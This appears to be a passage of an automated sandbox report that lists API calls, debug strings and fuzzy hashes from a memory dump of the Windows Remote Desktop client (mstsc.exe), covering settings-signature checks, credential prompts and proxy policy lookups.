                                                                                                                                                                                          • Part of subcall function 008E0EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,008DB78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0093A020,00000000,0093A020), ref: 008E0F32
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • SignScope, xrefs: 00924B3C
                                                                                                                                                                                        • CRdpSettingsStore::VerifySenstitiveSettings failed, xrefs: 00924B98
                                                                                                                                                                                        • CRdpSettingsStore::InitializeSignature failed., xrefs: 00924AFC
                                                                                                                                                                                        • CRdpSettingsStore::VerifySignature failed, xrefs: 00924AB4
                                                                                                                                                                                        • Empty signscope field, xrefs: 00924D2D
                                                                                                                                                                                        • Signature verification failed, xrefs: 00924CA8
                                                                                                                                                                                        • CRdpSettingsStore::GenerateSecureSettingsBlob failed, xrefs: 00924BEB
                                                                                                                                                                                        • CRdpSettingsStore::SetUnsignedBlob failed, xrefs: 00924C53
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ActivityControlEventFreeLocalMessageTracememset
                                                                                                                                                                                        • String ID: CRdpSettingsStore::GenerateSecureSettingsBlob failed$CRdpSettingsStore::InitializeSignature failed.$CRdpSettingsStore::SetUnsignedBlob failed$CRdpSettingsStore::VerifySenstitiveSettings failed$CRdpSettingsStore::VerifySignature failed$Empty signscope field$SignScope$Signature verification failed
                                                                                                                                                                                        • API String ID: 521830283-4263419474
                                                                                                                                                                                        • Opcode ID: 5ee1b36ac7fe03a2debca7446ec8d428b7fb00d28c95f209c926441c7d57d18c
                                                                                                                                                                                        • Instruction ID: 370e1339b76793a0580346027d6aed1c2f7448aede17aa9892a33b48f6489afe
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ee1b36ac7fe03a2debca7446ec8d428b7fb00d28c95f209c926441c7d57d18c
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3FA1D132614360AFC72ACF18E949F2A3BD9FB49710F050559F985DB2AAC670EC44DF92
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.MSVCRT ref: 00932B19
                                                                                                                                                                                        • memset.MSVCRT ref: 00932B2E
                                                                                                                                                                                        • memset.MSVCRT ref: 00932B4C
                                                                                                                                                                                        • memset.MSVCRT ref: 00932B67
                                                                                                                                                                                          • Part of subcall function 00928E3E: ??2@YAPAXI@Z.MSVCRT ref: 00928E50
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 0091ADD3: LocalFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000), ref: 0091AE64
                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,00000001,00000000,00000000,?,?,?,?,00000000,?), ref: 00932DFC
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • GetCanonicalServerName failed!, xrefs: 00932C85
                                                                                                                                                                                        • CTSCredManAssistant::CreateInstance failed!, xrefs: 00932BCE
                                                                                                                                                                                        • CTscCredentialsQueryUi::CreateInstance failed!, xrefs: 00932C31
                                                                                                                                                                                        • SaveCreds failed!, xrefs: 00932DC7
                                                                                                                                                                                        • GetPromptTextId failed!, xrefs: 00932D1A
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: memset$Free$Local$??2@AddressHandleLibraryModuleProc
                                                                                                                                                                                        • String ID: CTSCredManAssistant::CreateInstance failed!$CTscCredentialsQueryUi::CreateInstance failed!$GetCanonicalServerName failed!$GetPromptTextId failed!$SaveCreds failed!
                                                                                                                                                                                        • API String ID: 22622411-1265546757
                                                                                                                                                                                        • Opcode ID: 9224c0e81e034a992a4a51d585e126f5dca6ad68104753b58fc41b52866e6f8d
                                                                                                                                                                                        • Instruction ID: c8ce28ec41b8ad06a41332f0cd457de024ad19c6938728200b4066baefc6bcfa
                                                                                                                                                                                        • Opcode Fuzzy Hash: 9224c0e81e034a992a4a51d585e126f5dca6ad68104753b58fc41b52866e6f8d
                                                                                                                                                                                        • Instruction Fuzzy Hash: FE91CD71A08348AADB29CFA5CD86FAA77BDFB45304F040099F506D7191DA30DE81CF61
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,0000004C,00000000,00000100,?,TERMSRV,?), ref: 0092AA8A
                                                                                                                                                                                        • memset.MSVCRT ref: 0092AAE3
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000004,00000006), ref: 0092ABF1
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000), ref: 0092AC9D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008DF9DC: TraceMessage.ADVAPI32(?,00000000,0000002B,008D1728,00000010,00000000,00000004,?,00000005,00000000,00000001,00000000,00000000,?,008DFBF2,008E396B), ref: 008DFA1C
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000), ref: 0092ACB7
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Local$Free$Alloc$AddressHandleLibraryMessageModuleProcTracememset
                                                                                                                                                                                        • String ID: PSEC_WINNT_AUTH_IDENTITY_EX2$PWSTR$SspiPrepareForCredRead failed$StringCbCopy failed$StringCbLength failed
                                                                                                                                                                                        • API String ID: 1071269685-1201727769
                                                                                                                                                                                        • Opcode ID: 20af661445abfc3e1f4ee4de8a613e394e3c1be6a681a34996463d91eaeb7765
                                                                                                                                                                                        • Instruction ID: cc239f6be3d27299eea439c4bf9bc54a1c8f0fcd01e3db0d57b19f5715c4c637
                                                                                                                                                                                        • Opcode Fuzzy Hash: 20af661445abfc3e1f4ee4de8a613e394e3c1be6a681a34996463d91eaeb7765
                                                                                                                                                                                        • Instruction Fuzzy Hash: A5610473500364AFCB2ADF55E949F2A7BAAFF06310F154096E940AB3A6C774CD40DB82
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • PostMessageW.USER32 ref: 009310DC
                                                                                                                                                                                        • EndDialog.USER32 ref: 009310E5
                                                                                                                                                                                        • GetSystemMetrics.USER32(0000000C,?,00000000,?,00000002), ref: 0093114D
                                                                                                                                                                                        • GetSystemMetrics.USER32(0000000B,00000000,?,00000000,?,00000002), ref: 00931156
                                                                                                                                                                                        • GetDlgItem.USER32(?,0000139E), ref: 00931165
                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000000,?,00000002), ref: 00931177
                                                                                                                                                                                        • SetDlgItemTextW.USER32(?,0000139D,?,00000000,?,00000000,?,00000002), ref: 009311CF
                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,00000002), ref: 009311D9
                                                                                                                                                                                        • SendDlgItemMessageW.USER32(?,0000139F,0000040A,00000001,00000023,?,00000000,?,00000002), ref: 00931222
                                                                                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 0093122D
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Item$ErrorLastMessageMetricsSystem$DialogPostSendShowTextWindow
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3391194569-0
                                                                                                                                                                                        • Opcode ID: 05eed0fb12be521a19f024e3206cf318b9b536baf0d65b0bbde55c952c8c0766
                                                                                                                                                                                        • Instruction ID: 0399b743185ff2cf64b200a48a21160528b0cb37f1641b99fc5647f23feab3b8
                                                                                                                                                                                        • Opcode Fuzzy Hash: 05eed0fb12be521a19f024e3206cf318b9b536baf0d65b0bbde55c952c8c0766
                                                                                                                                                                                        • Instruction Fuzzy Hash: FA4170B1258701AFEB189FA4DD8AF7A77A9FB48701F008118F606E61B1DBB4DC509F61
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetDlgItem.USER32(00000000,00003309), ref: 009058A7
                                                                                                                                                                                        • IsDlgButtonChecked.USER32(00000000,00003310,?,0090582B,?,00000000), ref: 009058C0
                                                                                                                                                                                        • GetDlgItem.USER32(00000000,00003309), ref: 00905945
                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 0090594C
                                                                                                                                                                                        • SendMessageW.USER32(?,0000040A,00000001,00000000), ref: 00905964
                                                                                                                                                                                        • SendMessageW.USER32(?,00000405,00000001,00000000), ref: 00905971
                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000400,00000000,00000000), ref: 0090598C
                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000405,00000001,?), ref: 009059A5
                                                                                                                                                                                        • GetDlgItem.USER32(00000000,00003309), ref: 009059BB
                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 009059C2
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MessageSend$Item$EnableWindow$ButtonChecked
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1728075932-0
                                                                                                                                                                                        • Opcode ID: f55b30ff65f4908b1fd5eea16bd41ec7192bafe687cd0a801754737a4ec94f79
                                                                                                                                                                                        • Instruction ID: 7d58882f8299a3c5271f21446a92b0f24f27ffc1e7ce761af9490534c17e3e2e
                                                                                                                                                                                        • Opcode Fuzzy Hash: f55b30ff65f4908b1fd5eea16bd41ec7192bafe687cd0a801754737a4ec94f79
                                                                                                                                                                                        • Instruction Fuzzy Hash: A931F071204B04EFDB109F10CC99FAB3769EB85724F528029FA15AF2E0DB71A902DF50
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000100), ref: 008EE3F1
                                                                                                                                                                                          • Part of subcall function 008E2C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,008D7B50,0000000B,008E396B,00000004,00913BC2,00000004,00000000,?,00913BC2,008E396B,00000000,00000000,00000000), ref: 008E2C85
                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 008EE368
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E0EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,008DB78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0093A020,00000000,0093A020), ref: 008E0F32
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • Setting Remote Application's Arguments!, xrefs: 008EE262
                                                                                                                                                                                        • Setting Remote Application's Program!, xrefs: 008EE20F
                                                                                                                                                                                        • _msReconnect, xrefs: 008EE2C8
                                                                                                                                                                                        • AddRemoteApplicationToQueueUi failed!, xrefs: 008EE4B7
                                                                                                                                                                                        • GetTSRemoteApplication failed, xrefs: 008EE160
                                                                                                                                                                                        • Setting Remote Application's Name Failed!, xrefs: 008EE1BC
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: FreeMessageTrace$AddressErrorHandleLastLibraryModuleProcString
                                                                                                                                                                                        • String ID: AddRemoteApplicationToQueueUi failed!$GetTSRemoteApplication failed$Setting Remote Application's Arguments!$Setting Remote Application's Name Failed!$Setting Remote Application's Program!$_msReconnect
                                                                                                                                                                                        • API String ID: 3800867429-3388236451
                                                                                                                                                                                        • Opcode ID: cb40a963f9c00d5de799954f4cf59747e5c33042148dbaea1500663a7d8a095b
                                                                                                                                                                                        • Instruction ID: 8d54d2bb287fe27e00df931bf07b3ac727efb008e79e8ea1ba2b6d2f91b46551
                                                                                                                                                                                        • Opcode Fuzzy Hash: cb40a963f9c00d5de799954f4cf59747e5c33042148dbaea1500663a7d8a095b
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6AD1A171204385AFDB19DF16C989F6637AAFB8A308F04456DF985CB2A2D670DC45CF12
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CredReadW.ADVAPI32(?,00000006,00000000,00000000), ref: 009292D7
                                                                                                                                                                                        • GetLastError.KERNEL32(?,00929EF4,?,00000001,?,00000000,?,?,?,TERMSRV,?), ref: 009292E1
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E0EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,008DB78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0093A020,00000000,0093A020), ref: 008E0F32
                                                                                                                                                                                        • CredReadW.ADVAPI32(?,00000006,00000000,00000000), ref: 009293A5
                                                                                                                                                                                        • GetLastError.KERNEL32(?,00929EF4,?,00000001,?,00000000,?,?,?,TERMSRV,?), ref: 009293AF
                                                                                                                                                                                        • CredFree.ADVAPI32(00000000,?,00929EF4,?,00000001,?,00000000,?,?,?,TERMSRV,?), ref: 009294E6
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00929EF4,?,00000001,?,00000000,?,?,?,TERMSRV,?), ref: 009294F1
                                                                                                                                                                                          • Part of subcall function 0092B1E5: memset.MSVCRT ref: 0092B20A
                                                                                                                                                                                          • Part of subcall function 0092B1E5: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,?,?,00000100), ref: 0092B23A
                                                                                                                                                                                          • Part of subcall function 0092B1E5: VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003,?,?,00000100), ref: 0092B242
                                                                                                                                                                                          • Part of subcall function 0092B1E5: VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 0092B24F
                                                                                                                                                                                          • Part of subcall function 0092AA6B: LocalAlloc.KERNEL32(00000040,0000004C,00000000,00000100,?,TERMSRV,?), ref: 0092AA8A
                                                                                                                                                                                          • Part of subcall function 0092AA6B: LocalFree.KERNEL32(00000000,00000000), ref: 0092ACB7
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Free$CredLocal$ConditionErrorLastMaskRead$AddressAllocHandleInfoLibraryMessageModuleProcTraceVerifyVersionmemset
                                                                                                                                                                                        • String ID: GetTargetForExtednedCredential failed$StringCchCopy failed!
                                                                                                                                                                                        • API String ID: 1625013499-3322908828
                                                                                                                                                                                        • Opcode ID: ad6fe8201634c7a6d66ef8aa9ed30d7c5e19a52c63455bce3fa0d2711b1a2942
                                                                                                                                                                                        • Instruction ID: 0169fbf7d6c6f16d3e14d91b5dc918dfb0460ebcd3355859c953d57e89b1e286
                                                                                                                                                                                        • Opcode Fuzzy Hash: ad6fe8201634c7a6d66ef8aa9ed30d7c5e19a52c63455bce3fa0d2711b1a2942
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8271D136910374AFCB29AF59F949F6A3AA9BF06310F154095E840EB6B5C334CD41DBA2
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryMessageModuleProcTrace
                                                                                                                                                                                        • String ID: CreateItemMoniker failed$GetRunningObjectTable$QI(IMsRdpDeviceCollection2)$ROT->Register$dynusb:%d
                                                                                                                                                                                        • API String ID: 2296332203-1013186652
                                                                                                                                                                                        • Opcode ID: 1e22ed052a157b52dd3d8af46c563699b7b72653260c9252a13e0f61ab2adce1
                                                                                                                                                                                        • Instruction ID: eb2f123976331cf6081cff0032e1de4c95395bf662792612fa44e382f4ab3003
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1e22ed052a157b52dd3d8af46c563699b7b72653260c9252a13e0f61ab2adce1
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8061E072648718AFCB298F58C888FA67BA9FB49310F4B0689E855D7261C670DD80CF91
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,ProxyName,00000000,?,?,00000000), ref: 00919D93
                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,AllowExplicitProxyName,00000000,00000000,?,00000004), ref: 00919E11
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E2C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,008D7B50,0000000B,008E396B,00000004,00913BC2,00000004,00000000,?,00913BC2,008E396B,00000000,00000000,00000000), ref: 008E2C85
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: QueryValue$AddressFreeHandleLibraryMessageModuleProcTrace
                                                                                                                                                                                        • String ID: AllowExplicitProxyName$ProxyName$hGPKey$isEnforcedByGP$isGPDefined$proxyHostName
                                                                                                                                                                                        • API String ID: 1819154049-3315540633
                                                                                                                                                                                        • Opcode ID: 34c60303bae3e07925825fedaa6c716cb1bb8b725326c9d94b841dc84fbe3aaf
                                                                                                                                                                                        • Instruction ID: 8dead39a08fbdba21a57db94840b5a3b70dd96b097f465ee757c6bb5ad2e124b
                                                                                                                                                                                        • Opcode Fuzzy Hash: 34c60303bae3e07925825fedaa6c716cb1bb8b725326c9d94b841dc84fbe3aaf
                                                                                                                                                                                        • Instruction Fuzzy Hash: A8510F36704388AEDB2DCF54E958FA63BAAFB01718F144089F9418B2E1C635CD80CF81
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • MstscRemoteSessionsMgrWndClass, xrefs: 008E49EE
                                                                                                                                                                                        • Initialization of transaction linked list failed!, xrefs: 008E4915
                                                                                                                                                                                        • Initialization of queued apps linked list failed!, xrefs: 008E496A
                                                                                                                                                                                        • Failed to register window class, xrefs: 008E49B7
                                                                                                                                                                                        • m_cs.Init failed, xrefs: 008E4A90
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                        • String ID: Failed to register window class$Initialization of queued apps linked list failed!$Initialization of transaction linked list failed!$MstscRemoteSessionsMgrWndClass$m_cs.Init failed
                                                                                                                                                                                        • API String ID: 4061214504-3798914471
                                                                                                                                                                                        • Opcode ID: 7249abce4da6d9c0195a986bf03eb30b8c817179d1960d42684deb48bc29109d
                                                                                                                                                                                        • Instruction ID: 7ca79bb4f0f52cb6744e21de2f3e503b5991b2812b12f440fa5f95ce02ffa626
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7249abce4da6d9c0195a986bf03eb30b8c817179d1960d42684deb48bc29109d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 064125325943E06BCB298F5AC94DF667B95FF07320F060169F858DB2B2C760DC849B96
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,UseProxy,00000000,00000000,?,?), ref: 00919BDD
                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,AllowExplicitUseProxy,00000000,00000000,?,00000004), ref: 00919C64
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                                        • String ID: AllowExplicitUseProxy$UseProxy$hGPKey$isEnforcedByGP$isGPDefined$pProxyUsage
                                                                                                                                                                                        • API String ID: 3660427363-3121813369
                                                                                                                                                                                        • Opcode ID: 5dfbe27ba756eb73a93de606d53070bad42524a931885026cd3ed05bbbcc4baf
                                                                                                                                                                                        • Instruction ID: 0fb4467e617142291a08df1bf2889fb707daf64a4f844ff401dc2a9d6f884065
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5dfbe27ba756eb73a93de606d53070bad42524a931885026cd3ed05bbbcc4baf
                                                                                                                                                                                        • Instruction Fuzzy Hash: D151F171A44348EBCB29CF49E958F9A7FF9FB45300F0040D9E8869B2A2C670CD80CB81
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,0000020A,?,00000000,00000000), ref: 0091822A
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,00000000,00000000), ref: 00918357
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E0EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,008DB78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0093A020,00000000,0093A020), ref: 008E0F32
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: FreeLocal$AddressAllocHandleLibraryMessageModuleProcTrace
                                                                                                                                                                                        • String ID: GetMUIHandle$LoadString$StringCchPrintf$allocate memory for resultStr
                                                                                                                                                                                        • API String ID: 139613657-1679347992
                                                                                                                                                                                        • Opcode ID: 25651b07708df2fc2735b83132a15f3c2e3cd457abb2197377e86c9e4e6b752f
                                                                                                                                                                                        • Instruction ID: 5ee544ba780a3de96ca3b793a84b5d76bbd54a0e896bc03b4d9ec15d4928c1c1
                                                                                                                                                                                        • Opcode Fuzzy Hash: 25651b07708df2fc2735b83132a15f3c2e3cd457abb2197377e86c9e4e6b752f
                                                                                                                                                                                        • Instruction Fuzzy Hash: C64127326043586BDB2A9F598D49FA73BAABB05710F090484F964E72B2CF74CC81AF51
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CertGetCertificateContextProperty.CRYPT32(?,00000003,?,?), ref: 00926882
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 009268AF
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 009268DB
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 009268F7
                                                                                                                                                                                        • memcpy.MSVCRT(00000000,?,?), ref: 00926951
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ErrorLast$AllocCertCertificateContextLocalPropertymemcpy
                                                                                                                                                                                        • String ID: *ppThumbprint$GetCertificateThumbPrint failed$d
                                                                                                                                                                                        • API String ID: 4217741636-268901519
                                                                                                                                                                                        • Opcode ID: 33789e7ba6834fc473dd6a3ce0eff2c3629d29aaf13bf081d5b818f1a6da2686
                                                                                                                                                                                        • Instruction ID: e1adc6d6df94ae681ae39c088ea9cb6d8ebeadf35a0f4a605eac261ba1fe81d1
                                                                                                                                                                                        • Opcode Fuzzy Hash: 33789e7ba6834fc473dd6a3ce0eff2c3629d29aaf13bf081d5b818f1a6da2686
                                                                                                                                                                                        • Instruction Fuzzy Hash: 36414576514360AFCB289F28E845F2A7BE9FB45314F104459F980EB6A6CA31DC80DF92
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0092B349
